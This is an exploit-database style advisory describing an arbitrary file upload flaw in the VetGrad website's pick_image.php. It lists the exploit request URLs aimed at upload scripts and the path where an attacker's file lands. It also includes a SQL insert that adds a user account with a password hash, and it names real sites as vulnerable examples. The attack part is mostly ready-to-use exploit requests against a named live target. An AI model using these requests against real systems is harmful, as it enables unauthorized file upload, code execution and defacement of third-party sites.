VetGrad England Unauthorized File Insertation

1. ##################################################################################
2.  
3. # Exploit Title : VetGrad England Unauthorized File Insertation
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 06/03/2019
7. # Vendor Homepage : vetgrad.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
12. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
13. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
14. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
15.  
16. ##################################################################################
17.  
18. # Impact :
19. ***********
20. VetGrad is prone to an arbitrary file upload vulnerability. An attacker may leverage this issue to
21.  
22. upload arbitrary files to the affected computer; this can result in arbitrary code execution within the
23.  
24. context of the vulnerable application. Weaknesses in this category are related to the
25.  
26. management of permissions, privileges, and other security features that are used to perform access control.
27.  
28. ##################################################################################
29. # Information :
30. **************
31. Browse URL
32. This dialogue helps you select a URL for an image to be included in a page, or for the target of a hypertext link.
33.  
34. There are three options open to you:
35.  
36. Upload a file to the VetGrad website, and use it as the target;
37. Use the URL of an existing file on the VetGrad site; or
38. Type or paste the URL into the URL field if the target is on another site.
39. Once you have done one of these three, press the Submit button, or to abandon the operation, press the Cancel button.
40.  
41. ##################################################################################
42.  
43. # Exploit :
44. *********
45. /pick_image.php?dir=img/logos/www.vetstart.org/wp-content/&textfieldid=&imagefieldid=
46.  
47. /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_file.php&textfieldid=&imagefieldid=
48.  
49. /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_file_old.php&textfieldid=&imagefieldid=
50.  
51. /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_image.php&textfieldid=&imagefieldid=
52.  
53. /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_logo.php&textfieldid=&imagefieldid=
54.  
55. /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_logo_file.php&textfieldid=&imagefieldid=
56.  
57. # Directory File Path :
58. ********************
59. /img/logos/www.[DOMAINNAME].org/wp-content/themes/[YOURFILNAME].html
60.  
61. ##################################################################################
62.  
63. VULNERABLESITE/useradd.php
64.  
65. INSERT INTO mysql_auth SET username='', passwd='$1$PcRACb7v$0QysWGq5be5tyvOA0k5l80', email='' ;
66.  
67. ##################################################################################
68.  
69. # Example Vulnerable Sites :
70. *************************
71. [+] vetgrad.com/pick_image.php?dir=img/logos/www.vetstart.org/wp-content/&textfieldid=&imagefieldid=
72.  
73. [+] vetgrad.com/pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_file.php&textfieldid=&imagefieldid=
74.  
75. ##################################################################################
76.  
77. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
78.  
79. ##################################################################################